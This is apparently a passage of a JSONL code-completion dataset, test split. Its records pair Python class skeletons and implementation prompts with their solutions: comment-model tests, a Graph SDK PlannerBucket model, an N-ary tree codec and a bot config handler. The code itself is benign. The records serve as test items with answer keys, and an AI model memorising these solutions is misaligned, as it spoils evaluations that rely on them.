test_post_is_not_none_when_parent_is_kwarg(self): A comment's post field should not be none when parent is passed in as a a kwarg to create()\n\n<|skeleton|>\nclass CommentModelTests:\n\n def test_create_comment_missing_kwarg_raises_type_error(self):\n \"\"\"Not passing a required kwarg like body should raise type error\"\"\"\n <|body_0|>\n\n def test_create_comment_either_parent_or_post_must_be_kwarg(self):\n \"\"\"If neither 'parent' nor 'post' are passed as kwarg keys, a TypeError should be raised\"\"\"\n <|body_1|>\n\n def test_create_comment_parent_is_none_when_post_is_kwarg(self):\n \"\"\"A comment's 'parent' field should be none when 'post' is passed as a kwarg\"\"\"\n <|body_2|>\n\n def test_post_matches_parent_when_parent_is_comment(self):\n \"\"\"A comment's 'post'field should match its parent it when has a non-None parent\"\"\"\n <|body_3|>\n\n def test_post_is_not_none_when_parent_is_kwarg(self):\n \"\"\"A comment's post field should not be none when parent is passed in as a a kwarg to create()\"\"\"\n <|body_4|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n post = create_a_post()\n with self.assertRaises(TypeError):\n comment = Comment.create(post=post)\n<|end_body_0|>\n\n<|body_start_1|>\n post = create_a_post()\n with self.assertRaises(TypeError):\n Comment.create(body=\"This shouldn't work\")\n<|end_body_1|>\n\n<|body_start_2|>\n post = create_a_post()\n comment = Comment.create(body=\"I'm a comment without a parent\", post=post)\n self.assertIs(comment.parent, None)\n<|end_body_2|>\n\n<|body_start_3|>\n post = create_a_post()\n parent = Comment.create(body=\"I'm a parent comment\", post=post)\n comment = Comment.create(body=\"I'm a child comment\", parent=parent)\n self.assertIs(comment.post, parent.post)\n<|end_body_3|>\n\n<|body_start_4|>\n post = create_a_post()\n parent = Comment.create(body=\"I'm a parent comment\", post=post)\n comment = Comment.create(body=\"I'm a child comment\", parent=parent)\n self.assertIsNotNone(comment.post)\n<|end_body_4|>\n", "revision_id": "b7f177828efa57c1374fe0d8cea3a6a492ed1a47", "skeleton": 
"<|skeleton|>\nclass CommentModelTests:\n\n def test_create_comment_missing_kwarg_raises_type_error(self):\n \"\"\"Not passing a required kwarg like body should raise type error\"\"\"\n <|body_0|>\n\n def test_create_comment_either_parent_or_post_must_be_kwarg(self):\n \"\"\"If neither 'parent' nor 'post' are passed as kwarg keys, a TypeError should be raised\"\"\"\n <|body_1|>\n\n def test_create_comment_parent_is_none_when_post_is_kwarg(self):\n \"\"\"A comment's 'parent' field should be none when 'post' is passed as a kwarg\"\"\"\n <|body_2|>\n\n def test_post_matches_parent_when_parent_is_comment(self):\n \"\"\"A comment's 'post'field should match its parent it when has a non-None parent\"\"\"\n <|body_3|>\n\n def test_post_is_not_none_when_parent_is_kwarg(self):\n \"\"\"A comment's post field should not be none when parent is passed in as a a kwarg to create()\"\"\"\n <|body_4|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class CommentModelTests:\n def test_create_comment_missing_kwarg_raises_type_error(self):\n \"\"\"Not passing a required kwarg like body should raise type error\"\"\"\n post = create_a_post()\n with self.assertRaises(TypeError):\n comment = Comment.create(post=post)\n\n def test_create_comment_either_parent_or_post_must_be_kwarg(self):\n \"\"\"If neither 'parent' nor 'post' are passed as kwarg keys, a TypeError should be raised\"\"\"\n post = create_a_post()\n with self.assertRaises(TypeError):\n Comment.create(body=\"This shouldn't work\")\n\n def test_create_comment_parent_is_none_when_post_is_kwarg(self):\n \"\"\"A comment's 'parent' field should be none when 'post' is passed as a kwarg\"\"\"\n post = create_a_post()\n comment = Comment.create(body=\"I'm a comment without a parent\", post=post)\n self.assertIs(comment.parent, None)\n\n def test_post_matches_parent_when_parent_is_comment(self):\n \"\"\"A comment's 'post'field should match its parent it when has a non-None parent\"\"\"\n post = create_a_post()\n parent = Comment.create(body=\"I'm a parent comment\", post=post)\n comment = Comment.create(body=\"I'm a child comment\", parent=parent)\n self.assertIs(comment.post, parent.post)\n\n def test_post_is_not_none_when_parent_is_kwarg(self):\n \"\"\"A comment's post field should not be none when parent is passed in as a a kwarg to create()\"\"\"\n post = create_a_post()\n parent = Comment.create(body=\"I'm a parent comment\", post=post)\n comment = Comment.create(body=\"I'm a child comment\", parent=parent)\n self.assertIsNotNone(comment.post)\n", "source": "the_stack_v2_python_sparse", "source_path": "discussions/tests.py", "source_repo": "jeury301/classmo", "split": "test", "star_events_count": 0} {"blob_id": "78eafb97ba6c2ea8c173a9cea7f4d2afaabe6633", "bodies": ["if not parse_node:\n raise TypeError('parse_node cannot be null.')\nreturn PlannerBucket()", "from .entity import Entity\nfrom .planner_task import PlannerTask\nfrom .entity import Entity\nfrom .planner_task import PlannerTask\nfields: Dict[str, Callable[[Any], None]] = {'name': lambda n: setattr(self, 'name', n.get_str_value()), 'orderHint': lambda n: setattr(self, 'order_hint', n.get_str_value()), 'planId': lambda n: setattr(self, 'plan_id', n.get_str_value()), 'tasks': lambda n: setattr(self, 'tasks', n.get_collection_of_object_values(PlannerTask))}\nsuper_fields = super().get_field_deserializers()\nfields.update(super_fields)\nreturn fields", "if not writer:\n raise TypeError('writer cannot be 
null.')\nsuper().serialize(writer)\nwriter.write_str_value('name', self.name)\nwriter.write_str_value('orderHint', self.order_hint)\nwriter.write_str_value('planId', self.plan_id)\nwriter.write_collection_of_object_values('tasks', self.tasks)"], "bodies_text": "<|body_start_0|>\n if not parse_node:\n raise TypeError('parse_node cannot be null.')\n return PlannerBucket()\n<|end_body_0|>\n\n<|body_start_1|>\n from .entity import Entity\n from .planner_task import PlannerTask\n from .entity import Entity\n from .planner_task import PlannerTask\n fields: Dict[str, Callable[[Any], None]] = {'name': lambda n: setattr(self, 'name', n.get_str_value()), 'orderHint': lambda n: setattr(self, 'order_hint', n.get_str_value()), 'planId': lambda n: setattr(self, 'plan_id', n.get_str_value()), 'tasks': lambda n: setattr(self, 'tasks', n.get_collection_of_object_values(PlannerTask))}\n super_fields = super().get_field_deserializers()\n fields.update(super_fields)\n return fields\n<|end_body_1|>\n\n<|body_start_2|>\n if not writer:\n raise TypeError('writer cannot be null.')\n super().serialize(writer)\n writer.write_str_value('name', self.name)\n writer.write_str_value('orderHint', self.order_hint)\n writer.write_str_value('planId', self.plan_id)\n writer.write_collection_of_object_values('tasks', self.tasks)\n<|end_body_2|>\n", "class_docstring": "", "class_name": "PlannerBucket", "detected_licenses": ["MIT"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass PlannerBucket:\n\n def create_from_discriminator_value(parse_node: Optional[ParseNode]=None) -> PlannerBucket:\n \"\"\"Creates a new instance of the appropriate class based on discriminator value Args: parse_node: The parse node to use to read the discriminator value and create the object Returns: PlannerBucket\"\"\"\n <|body_0|>\n\n def get_field_deserializers(self) -> Dict[str, Callable[[ParseNode], None]]:\n \"\"\"The deserialization information for the current model Returns: Dict[str, Callable[[ParseNode], None]]\"\"\"\n <|body_1|>\n\n def serialize(self, writer: SerializationWriter) -> None:\n \"\"\"Serializes information the current object Args: writer: Serialization writer to use to serialize this model\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if not parse_node:\n raise TypeError('parse_node cannot be null.')\n return PlannerBucket()\n<|end_body_0|>\n\n<|body_start_1|>\n from .entity import Entity\n from .planner_task import PlannerTask\n from .entity import Entity\n from .planner_task import PlannerTask\n fields: Dict[str, Callable[[Any], None]] = {'name': lambda n: setattr(self, 'name', n.get_str_value()), 'orderHint': lambda n: setattr(self, 'order_hint', n.get_str_value()), 'planId': lambda n: setattr(self, 'plan_id', n.get_str_value()), 'tasks': lambda n: setattr(self, 'tasks', n.get_collection_of_object_values(PlannerTask))}\n super_fields = super().get_field_deserializers()\n fields.update(super_fields)\n return fields\n<|end_body_1|>\n\n<|body_start_2|>\n if not writer:\n raise TypeError('writer cannot be null.')\n super().serialize(writer)\n writer.write_str_value('name', self.name)\n writer.write_str_value('orderHint', self.order_hint)\n writer.write_str_value('planId', self.plan_id)\n writer.write_collection_of_object_values('tasks', self.tasks)\n<|end_body_2|>\n", "id": "stack_v2_sparse_classes_10k_test_000092", "length_bytes": 2863, "license_type": "permissive", "methods": [{"docstring": "Creates a new instance of the appropriate class based on discriminator value Args: 
parse_node: The parse node to use to read the discriminator value and create the object Returns: PlannerBucket", "name": "create_from_discriminator_value", "signature": "def create_from_discriminator_value(parse_node: Optional[ParseNode]=None) -> PlannerBucket"}, {"docstring": "The deserialization information for the current model Returns: Dict[str, Callable[[ParseNode], None]]", "name": "get_field_deserializers", "signature": "def get_field_deserializers(self) -> Dict[str, Callable[[ParseNode], None]]"}, {"docstring": "Serializes information the current object Args: writer: Serialization writer to use to serialize this model", "name": "serialize", "signature": "def serialize(self, writer: SerializationWriter) -> None"}], "n_methods": 3, "prompt": "Implement the Python class `PlannerBucket` described below.\n\nClass description:\nImplement the PlannerBucket class.\n\nMethod signatures and docstrings:\n- def create_from_discriminator_value(parse_node: Optional[ParseNode]=None) -> PlannerBucket: Creates a new instance of the appropriate class based on discriminator value Args: parse_node: The parse node to use to read the discriminator value and create the object Returns: PlannerBucket\n- def get_field_deserializers(self) -> Dict[str, Callable[[ParseNode], None]]: The deserialization information for the current model Returns: Dict[str, Callable[[ParseNode], None]]\n- def serialize(self, writer: SerializationWriter) -> None: Serializes information the current object Args: writer: Serialization writer to use to serialize this model", "prompted_full_text": "Implement the Python class `PlannerBucket` described below.\n\nClass description:\nImplement the PlannerBucket class.\n\nMethod signatures and docstrings:\n- def create_from_discriminator_value(parse_node: Optional[ParseNode]=None) -> PlannerBucket: Creates a new instance of the appropriate class based on discriminator value Args: parse_node: The parse node to use to read the discriminator value and create the object Returns: PlannerBucket\n- def get_field_deserializers(self) -> Dict[str, Callable[[ParseNode], None]]: The deserialization information for the current model Returns: Dict[str, Callable[[ParseNode], None]]\n- def serialize(self, writer: SerializationWriter) -> None: Serializes information the current object Args: writer: Serialization writer to use to serialize this model\n\n<|skeleton|>\nclass PlannerBucket:\n\n def create_from_discriminator_value(parse_node: Optional[ParseNode]=None) -> PlannerBucket:\n \"\"\"Creates a new instance of the appropriate class based on discriminator value Args: parse_node: The parse node to use to read the discriminator value and create the object Returns: PlannerBucket\"\"\"\n <|body_0|>\n\n def get_field_deserializers(self) -> Dict[str, Callable[[ParseNode], None]]:\n \"\"\"The deserialization information for the current model Returns: Dict[str, Callable[[ParseNode], None]]\"\"\"\n <|body_1|>\n\n def serialize(self, writer: SerializationWriter) -> None:\n \"\"\"Serializes information the current object Args: writer: Serialization writer to use to serialize this model\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if not parse_node:\n raise TypeError('parse_node cannot be null.')\n return PlannerBucket()\n<|end_body_0|>\n\n<|body_start_1|>\n from .entity import Entity\n from .planner_task import PlannerTask\n from .entity import Entity\n from .planner_task import PlannerTask\n fields: Dict[str, Callable[[Any], None]] = {'name': lambda n: setattr(self, 'name', n.get_str_value()), 
'orderHint': lambda n: setattr(self, 'order_hint', n.get_str_value()), 'planId': lambda n: setattr(self, 'plan_id', n.get_str_value()), 'tasks': lambda n: setattr(self, 'tasks', n.get_collection_of_object_values(PlannerTask))}\n super_fields = super().get_field_deserializers()\n fields.update(super_fields)\n return fields\n<|end_body_1|>\n\n<|body_start_2|>\n if not writer:\n raise TypeError('writer cannot be null.')\n super().serialize(writer)\n writer.write_str_value('name', self.name)\n writer.write_str_value('orderHint', self.order_hint)\n writer.write_str_value('planId', self.plan_id)\n writer.write_collection_of_object_values('tasks', self.tasks)\n<|end_body_2|>\n", "revision_id": "27de7ccbe688d7614b2f6bde0fdbcda4bc5cc949", "skeleton": "<|skeleton|>\nclass PlannerBucket:\n\n def create_from_discriminator_value(parse_node: Optional[ParseNode]=None) -> PlannerBucket:\n \"\"\"Creates a new instance of the appropriate class based on discriminator value Args: parse_node: The parse node to use to read the discriminator value and create the object Returns: PlannerBucket\"\"\"\n <|body_0|>\n\n def get_field_deserializers(self) -> Dict[str, Callable[[ParseNode], None]]:\n \"\"\"The deserialization information for the current model Returns: Dict[str, Callable[[ParseNode], None]]\"\"\"\n <|body_1|>\n\n def serialize(self, writer: SerializationWriter) -> None:\n \"\"\"Serializes information the current object Args: writer: Serialization writer to use to serialize this model\"\"\"\n <|body_2|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class PlannerBucket:\n def create_from_discriminator_value(parse_node: Optional[ParseNode]=None) -> PlannerBucket:\n \"\"\"Creates a new instance of the appropriate class based on discriminator value Args: parse_node: The parse node to use to read the discriminator value and create the object Returns: PlannerBucket\"\"\"\n if not parse_node:\n raise TypeError('parse_node cannot be null.')\n return PlannerBucket()\n\n def get_field_deserializers(self) -> Dict[str, Callable[[ParseNode], None]]:\n \"\"\"The deserialization information for the current model Returns: Dict[str, Callable[[ParseNode], None]]\"\"\"\n from .entity import Entity\n from .planner_task import PlannerTask\n from .entity import Entity\n from .planner_task import PlannerTask\n fields: Dict[str, Callable[[Any], None]] = {'name': lambda n: setattr(self, 'name', n.get_str_value()), 'orderHint': lambda n: setattr(self, 'order_hint', n.get_str_value()), 'planId': lambda n: setattr(self, 'plan_id', n.get_str_value()), 'tasks': lambda n: setattr(self, 'tasks', n.get_collection_of_object_values(PlannerTask))}\n super_fields = super().get_field_deserializers()\n fields.update(super_fields)\n return fields\n\n def serialize(self, writer: SerializationWriter) -> None:\n \"\"\"Serializes information the current object Args: writer: Serialization writer to use to serialize this model\"\"\"\n if not writer:\n raise TypeError('writer cannot be null.')\n super().serialize(writer)\n writer.write_str_value('name', self.name)\n writer.write_str_value('orderHint', self.order_hint)\n writer.write_str_value('planId', self.plan_id)\n writer.write_collection_of_object_values('tasks', self.tasks)\n", "source": "the_stack_v2_python_sparse", "source_path": "msgraph/generated/models/planner_bucket.py", "source_repo": "microsoftgraph/msgraph-sdk-python", "split": "test", "star_events_count": 135} {"blob_id": 
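The PlannerBucket record above follows the Kiota field-deserializer pattern: get_field_deserializers returns a dict mapping wire names ('name', 'orderHint', 'planId', 'tasks') to setter callbacks, and serialize mirrors the same names on the way out. A minimal, self-contained sketch of that pattern follows; FakeParseNode and Bucket are hypothetical stand-ins for the Kiota runtime types, and only the dict-of-setters dispatch itself is taken from the record.

# Minimal sketch of the Kiota-style field-deserializer pattern seen in the
# PlannerBucket record. FakeParseNode is a hypothetical stand-in for the real
# kiota ParseNode; only the wire-name -> setter dispatch is from the record.
from typing import Any, Callable, Dict, Optional


class FakeParseNode:
    """Wraps one raw value and exposes typed getters, like a ParseNode."""

    def __init__(self, value: Any) -> None:
        self._value = value

    def get_str_value(self) -> str:
        return str(self._value)


class Bucket:
    def __init__(self) -> None:
        self.name: Optional[str] = None
        self.plan_id: Optional[str] = None

    def get_field_deserializers(self) -> Dict[str, Callable[[FakeParseNode], None]]:
        # Wire name -> setter, the same shape PlannerBucket's dict uses.
        return {
            'name': lambda n: setattr(self, 'name', n.get_str_value()),
            'planId': lambda n: setattr(self, 'plan_id', n.get_str_value()),
        }


raw = {'name': 'To do', 'planId': 'plan-123'}
bucket = Bucket()
fields = bucket.get_field_deserializers()
for key, value in raw.items():
    if key in fields:
        fields[key](FakeParseNode(value))  # dispatch each field to its setter
assert (bucket.name, bucket.plan_id) == ('To do', 'plan-123')

Note that the record's own get_field_deserializers imports Entity and PlannerTask twice in a row; the duplication is harmless (imports are idempotent) and is reproduced verbatim from the source file.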
"cd3573f0dfa867d336d395af0fa81e99a4782534", "bodies": ["res = []\n\ndef helper(root):\n if not root:\n return\n res.append(str(root.val))\n res.append(str(len(root.children)))\n for ch in root.children:\n helper(ch)\nhelper(root)\nreturn ','.join(res)", "if not data:\n return\ndata = iter(data.split(','))\n\ndef helper():\n tmp = int(next(data))\n num = int(next(data))\n root = Node(tmp, [])\n for _ in range(num):\n root.children.append(helper())\n return root\nreturn helper()"], "bodies_text": "<|body_start_0|>\n res = []\n\n def helper(root):\n if not root:\n return\n res.append(str(root.val))\n res.append(str(len(root.children)))\n for ch in root.children:\n helper(ch)\n helper(root)\n return ','.join(res)\n<|end_body_0|>\n\n<|body_start_1|>\n if not data:\n return\n data = iter(data.split(','))\n\n def helper():\n tmp = int(next(data))\n num = int(next(data))\n root = Node(tmp, [])\n for _ in range(num):\n root.children.append(helper())\n return root\n return helper()\n<|end_body_1|>\n", "class_docstring": "", "class_name": "Codec", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Codec:\n\n def serialize(self, root: 'Node') -> str:\n \"\"\"Encodes a tree to a single string. :type root: Node :rtype: str\"\"\"\n <|body_0|>\n\n def deserialize(self, data: str) -> 'Node':\n \"\"\"Decodes your encoded data to tree. :type data: str :rtype: Node\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n res = []\n\n def helper(root):\n if not root:\n return\n res.append(str(root.val))\n res.append(str(len(root.children)))\n for ch in root.children:\n helper(ch)\n helper(root)\n return ','.join(res)\n<|end_body_0|>\n\n<|body_start_1|>\n if not data:\n return\n data = iter(data.split(','))\n\n def helper():\n tmp = int(next(data))\n num = int(next(data))\n root = Node(tmp, [])\n for _ in range(num):\n root.children.append(helper())\n return root\n return helper()\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000093", "length_bytes": 2421, "license_type": "no_license", "methods": [{"docstring": "Encodes a tree to a single string. :type root: Node :rtype: str", "name": "serialize", "signature": "def serialize(self, root: 'Node') -> str"}, {"docstring": "Decodes your encoded data to tree. :type data: str :rtype: Node", "name": "deserialize", "signature": "def deserialize(self, data: str) -> 'Node'"}], "n_methods": 2, "prompt": "Implement the Python class `Codec` described below.\n\nClass description:\nImplement the Codec class.\n\nMethod signatures and docstrings:\n- def serialize(self, root: 'Node') -> str: Encodes a tree to a single string. :type root: Node :rtype: str\n- def deserialize(self, data: str) -> 'Node': Decodes your encoded data to tree. :type data: str :rtype: Node", "prompted_full_text": "Implement the Python class `Codec` described below.\n\nClass description:\nImplement the Codec class.\n\nMethod signatures and docstrings:\n- def serialize(self, root: 'Node') -> str: Encodes a tree to a single string. :type root: Node :rtype: str\n- def deserialize(self, data: str) -> 'Node': Decodes your encoded data to tree. :type data: str :rtype: Node\n\n<|skeleton|>\nclass Codec:\n\n def serialize(self, root: 'Node') -> str:\n \"\"\"Encodes a tree to a single string. :type root: Node :rtype: str\"\"\"\n <|body_0|>\n\n def deserialize(self, data: str) -> 'Node':\n \"\"\"Decodes your encoded data to tree. 
:type data: str :rtype: Node\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n res = []\n\n def helper(root):\n if not root:\n return\n res.append(str(root.val))\n res.append(str(len(root.children)))\n for ch in root.children:\n helper(ch)\n helper(root)\n return ','.join(res)\n<|end_body_0|>\n\n<|body_start_1|>\n if not data:\n return\n data = iter(data.split(','))\n\n def helper():\n tmp = int(next(data))\n num = int(next(data))\n root = Node(tmp, [])\n for _ in range(num):\n root.children.append(helper())\n return root\n return helper()\n<|end_body_1|>\n", "revision_id": "631df2ce6892a6fbb3e435f57e90d85f8200d125", "skeleton": "<|skeleton|>\nclass Codec:\n\n def serialize(self, root: 'Node') -> str:\n \"\"\"Encodes a tree to a single string. :type root: Node :rtype: str\"\"\"\n <|body_0|>\n\n def deserialize(self, data: str) -> 'Node':\n \"\"\"Decodes your encoded data to tree. :type data: str :rtype: Node\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Codec:\n def serialize(self, root: 'Node') -> str:\n \"\"\"Encodes a tree to a single string. :type root: Node :rtype: str\"\"\"\n res = []\n\n def helper(root):\n if not root:\n return\n res.append(str(root.val))\n res.append(str(len(root.children)))\n for ch in root.children:\n helper(ch)\n helper(root)\n return ','.join(res)\n\n def deserialize(self, data: str) -> 'Node':\n \"\"\"Decodes your encoded data to tree. :type data: str :rtype: Node\"\"\"\n if not data:\n return\n data = iter(data.split(','))\n\n def helper():\n tmp = int(next(data))\n num = int(next(data))\n root = Node(tmp, [])\n for _ in range(num):\n root.children.append(helper())\n return root\n return helper()\n", "source": "the_stack_v2_python_sparse", "source_path": "428. Serialize and Deserialize N-ary Tree.py", "source_repo": "c940606/leetcode", "split": "test", "star_events_count": 3} {"blob_id": "5513b1a465acc12fc9e986102ffd80c109b438d1", "bodies": ["super().__init__(*args, **kwargs)\nself.config = {}\nself.config_file = kwargs.get('config_file', 'config.json')\nself.session = aiohttp.ClientSession(loop=self.loop)", "if not filename:\n filename = self.config_file\nwith open(filename) as file_object:\n config = json.load(file_object)\nif isinstance(config, dict):\n for key, value in config.items():\n self.config[key] = value", "if not filename:\n filename = self.config_file\nwith open(filename, 'w') as file_object:\n json.dump(self.config, file_object, indent=4, sort_keys=True)"], "bodies_text": "<|body_start_0|>\n super().__init__(*args, **kwargs)\n self.config = {}\n self.config_file = kwargs.get('config_file', 'config.json')\n self.session = aiohttp.ClientSession(loop=self.loop)\n<|end_body_0|>\n\n<|body_start_1|>\n if not filename:\n filename = self.config_file\n with open(filename) as file_object:\n config = json.load(file_object)\n if isinstance(config, dict):\n for key, value in config.items():\n self.config[key] = value\n<|end_body_1|>\n\n<|body_start_2|>\n if not filename:\n filename = self.config_file\n with open(filename, 'w') as file_object:\n json.dump(self.config, file_object, indent=4, sort_keys=True)\n<|end_body_2|>\n", "class_docstring": "A custom bot object that provides a configuration handler and an aiohttp ClientSession. 
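The Codec record above encodes an N-ary tree in preorder as alternating value and child-count tokens, and deserialize consumes the same token stream recursively. A self-contained roundtrip check, adapted from the record's two bodies, with a plain Node(val, children) class matching the constructor the record assumes:

# Roundtrip check for the N-ary tree Codec shown in the record above.
class Node:
    def __init__(self, val, children):
        self.val = val
        self.children = children


class Codec:
    def serialize(self, root):
        res = []

        def helper(node):
            if not node:
                return
            res.append(str(node.val))            # value token
            res.append(str(len(node.children)))  # child-count token
            for ch in node.children:
                helper(ch)

        helper(root)
        return ','.join(res)

    def deserialize(self, data):
        if not data:
            return None
        tokens = iter(data.split(','))

        def helper():
            val = int(next(tokens))
            num = int(next(tokens))
            node = Node(val, [])
            for _ in range(num):
                node.children.append(helper())
            return node

        return helper()


codec = Codec()
tree = Node(1, [Node(3, [Node(5, []), Node(6, [])]), Node(2, []), Node(4, [])])
encoded = codec.serialize(tree)
assert encoded == '1,3,3,2,5,0,6,0,2,0,4,0'
assert codec.serialize(codec.deserialize(encoded)) == encoded

Because each node carries its own child count, no sentinel markers are needed and the decoder knows exactly how many recursive calls to make per node.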
This is similar to k3.", "class_name": "Bot", "detected_licenses": ["MIT", "LicenseRef-scancode-unknown-license-reference"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Bot:\n \"\"\"A custom bot object that provides a configuration handler and an aiohttp ClientSession. This is similar to k3.\"\"\"\n\n def __init__(self, *args, **kwargs):\n \"\"\"In addition to everything supported by commands.Bot, this also supports: * `config_file` - An `str` representing the configuration file of the bot. Defaults to `config.json`. This doesn't really have to be used, but it's there for convenience reasons. Instance variables not in the constructor: * `session` - An `aiohttp.ClientSession` that the bot can use to make HTTP requests. This is useful for commands that perform API hooks. * `config` - A `dict` containing key-value pairs meant for bot configuration. This doesn't really have to be used, but it's there for convenience reasons.\"\"\"\n <|body_0|>\n\n def load_config(self, filename: str=None):\n \"\"\"Load config from a JSON file. * `filename` - The filename of the JSON file to be loaded. If not specified, the bot will default to `Bot.config_file`.\"\"\"\n <|body_1|>\n\n def save_config(self, filename: str=None):\n \"\"\"Save config to a JSON file. * `filename` - The filename of the JSON file to be saved to. If not specified, the bot will default to `Bot.config_file`.\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n super().__init__(*args, **kwargs)\n self.config = {}\n self.config_file = kwargs.get('config_file', 'config.json')\n self.session = aiohttp.ClientSession(loop=self.loop)\n<|end_body_0|>\n\n<|body_start_1|>\n if not filename:\n filename = self.config_file\n with open(filename) as file_object:\n config = json.load(file_object)\n if isinstance(config, dict):\n for key, value in config.items():\n self.config[key] = value\n<|end_body_1|>\n\n<|body_start_2|>\n if not filename:\n filename = self.config_file\n with open(filename, 'w') as file_object:\n json.dump(self.config, file_object, indent=4, sort_keys=True)\n<|end_body_2|>\n", "id": "stack_v2_sparse_classes_10k_test_000094", "length_bytes": 2231, "license_type": "permissive", "methods": [{"docstring": "In addition to everything supported by commands.Bot, this also supports: * `config_file` - An `str` representing the configuration file of the bot. Defaults to `config.json`. This doesn't really have to be used, but it's there for convenience reasons. Instance variables not in the constructor: * `session` - An `aiohttp.ClientSession` that the bot can use to make HTTP requests. This is useful for commands that perform API hooks. * `config` - A `dict` containing key-value pairs meant for bot configuration. This doesn't really have to be used, but it's there for convenience reasons.", "name": "__init__", "signature": "def __init__(self, *args, **kwargs)"}, {"docstring": "Load config from a JSON file. * `filename` - The filename of the JSON file to be loaded. If not specified, the bot will default to `Bot.config_file`.", "name": "load_config", "signature": "def load_config(self, filename: str=None)"}, {"docstring": "Save config to a JSON file. * `filename` - The filename of the JSON file to be saved to. 
If not specified, the bot will default to `Bot.config_file`.", "name": "save_config", "signature": "def save_config(self, filename: str=None)"}], "n_methods": 3, "original_id": "stack_v2_sparse_classes_30k_train_001063", "prompt": "Implement the Python class `Bot` described below.\n\nClass description:\nA custom bot object that provides a configuration handler and an aiohttp ClientSession. This is similar to k3.\n\nMethod signatures and docstrings:\n- def __init__(self, *args, **kwargs): In addition to everything supported by commands.Bot, this also supports: * `config_file` - An `str` representing the configuration file of the bot. Defaults to `config.json`. This doesn't really have to be used, but it's there for convenience reasons. Instance variables not in the constructor: * `session` - An `aiohttp.ClientSession` that the bot can use to make HTTP requests. This is useful for commands that perform API hooks. * `config` - A `dict` containing key-value pairs meant for bot configuration. This doesn't really have to be used, but it's there for convenience reasons.\n- def load_config(self, filename: str=None): Load config from a JSON file. * `filename` - The filename of the JSON file to be loaded. If not specified, the bot will default to `Bot.config_file`.\n- def save_config(self, filename: str=None): Save config to a JSON file. * `filename` - The filename of the JSON file to be saved to. If not specified, the bot will default to `Bot.config_file`.", "prompted_full_text": "Implement the Python class `Bot` described below.\n\nClass description:\nA custom bot object that provides a configuration handler and an aiohttp ClientSession. This is similar to k3.\n\nMethod signatures and docstrings:\n- def __init__(self, *args, **kwargs): In addition to everything supported by commands.Bot, this also supports: * `config_file` - An `str` representing the configuration file of the bot. Defaults to `config.json`. This doesn't really have to be used, but it's there for convenience reasons. Instance variables not in the constructor: * `session` - An `aiohttp.ClientSession` that the bot can use to make HTTP requests. This is useful for commands that perform API hooks. * `config` - A `dict` containing key-value pairs meant for bot configuration. This doesn't really have to be used, but it's there for convenience reasons.\n- def load_config(self, filename: str=None): Load config from a JSON file. * `filename` - The filename of the JSON file to be loaded. If not specified, the bot will default to `Bot.config_file`.\n- def save_config(self, filename: str=None): Save config to a JSON file. * `filename` - The filename of the JSON file to be saved to. If not specified, the bot will default to `Bot.config_file`.\n\n<|skeleton|>\nclass Bot:\n \"\"\"A custom bot object that provides a configuration handler and an aiohttp ClientSession. This is similar to k3.\"\"\"\n\n def __init__(self, *args, **kwargs):\n \"\"\"In addition to everything supported by commands.Bot, this also supports: * `config_file` - An `str` representing the configuration file of the bot. Defaults to `config.json`. This doesn't really have to be used, but it's there for convenience reasons. Instance variables not in the constructor: * `session` - An `aiohttp.ClientSession` that the bot can use to make HTTP requests. This is useful for commands that perform API hooks. * `config` - A `dict` containing key-value pairs meant for bot configuration. 
This doesn't really have to be used, but it's there for convenience reasons.\"\"\"\n <|body_0|>\n\n def load_config(self, filename: str=None):\n \"\"\"Load config from a JSON file. * `filename` - The filename of the JSON file to be loaded. If not specified, the bot will default to `Bot.config_file`.\"\"\"\n <|body_1|>\n\n def save_config(self, filename: str=None):\n \"\"\"Save config to a JSON file. * `filename` - The filename of the JSON file to be saved to. If not specified, the bot will default to `Bot.config_file`.\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n super().__init__(*args, **kwargs)\n self.config = {}\n self.config_file = kwargs.get('config_file', 'config.json')\n self.session = aiohttp.ClientSession(loop=self.loop)\n<|end_body_0|>\n\n<|body_start_1|>\n if not filename:\n filename = self.config_file\n with open(filename) as file_object:\n config = json.load(file_object)\n if isinstance(config, dict):\n for key, value in config.items():\n self.config[key] = value\n<|end_body_1|>\n\n<|body_start_2|>\n if not filename:\n filename = self.config_file\n with open(filename, 'w') as file_object:\n json.dump(self.config, file_object, indent=4, sort_keys=True)\n<|end_body_2|>\n", "revision_id": "9bf3f2125939b66bd1894e509c1b1fa1ab413a6a", "skeleton": "<|skeleton|>\nclass Bot:\n \"\"\"A custom bot object that provides a configuration handler and an aiohttp ClientSession. This is similar to k3.\"\"\"\n\n def __init__(self, *args, **kwargs):\n \"\"\"In addition to everything supported by commands.Bot, this also supports: * `config_file` - An `str` representing the configuration file of the bot. Defaults to `config.json`. This doesn't really have to be used, but it's there for convenience reasons. Instance variables not in the constructor: * `session` - An `aiohttp.ClientSession` that the bot can use to make HTTP requests. This is useful for commands that perform API hooks. * `config` - A `dict` containing key-value pairs meant for bot configuration. This doesn't really have to be used, but it's there for convenience reasons.\"\"\"\n <|body_0|>\n\n def load_config(self, filename: str=None):\n \"\"\"Load config from a JSON file. * `filename` - The filename of the JSON file to be loaded. If not specified, the bot will default to `Bot.config_file`.\"\"\"\n <|body_1|>\n\n def save_config(self, filename: str=None):\n \"\"\"Save config to a JSON file. * `filename` - The filename of the JSON file to be saved to. If not specified, the bot will default to `Bot.config_file`.\"\"\"\n <|body_2|>\n\n<|end_skeleton|>", "snapshot_name": 